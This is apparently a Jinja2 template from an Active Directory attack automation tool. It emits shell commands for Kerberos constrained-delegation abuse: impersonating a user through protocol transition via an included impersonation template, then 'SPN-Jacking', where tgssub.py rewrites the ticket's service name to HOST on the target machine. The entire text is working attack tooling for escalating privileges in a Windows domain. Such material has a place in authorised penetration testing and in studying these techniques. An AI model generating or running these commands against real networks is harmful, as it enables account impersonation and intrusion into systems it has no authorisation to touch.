{% if not parent.obj.trustedtoauth %}{# from SelfRBCD #}
{% set do_additional = True %}
{%- else %}
{% set do_additional = False %}
# Constrained delegation with protocol transition (TRUSTED_TO_AUTH_FOR_DELEGATION)

{% endif %}
{# take arbitrary the first spn #}
{% set old_need_fqdn = parent.krb_need_fqdn %}
{% set requested_spn = parent.obj.rights_by_sid[original_target.sid]['AllowedToDelegate'][0] %}
{% set do_u2u = False %}
{% include '_GetSTImpersonate.jinja2' %}
{# For SPN-Jacking #}
{% if original_target.sid != target.sid %}

# Substitute the sname in the ticket
{%- set contains_fqdn = requested_spn.upper().endswith(fqdn.upper()) %}

{% if not old_need_fqdn and contains_fqdn %}
tgssub.py -in "$KRB5CCNAME" -out new.ccache -altservice HOST/{{target_no_dollar}}.{{fqdn}}
{% else %}
tgssub.py -in "$KRB5CCNAME" -out new.ccache -altservice HOST/{{target_no_dollar}}
{% endif %}
export KRB5CCNAME=new.ccache
{%- endif %}
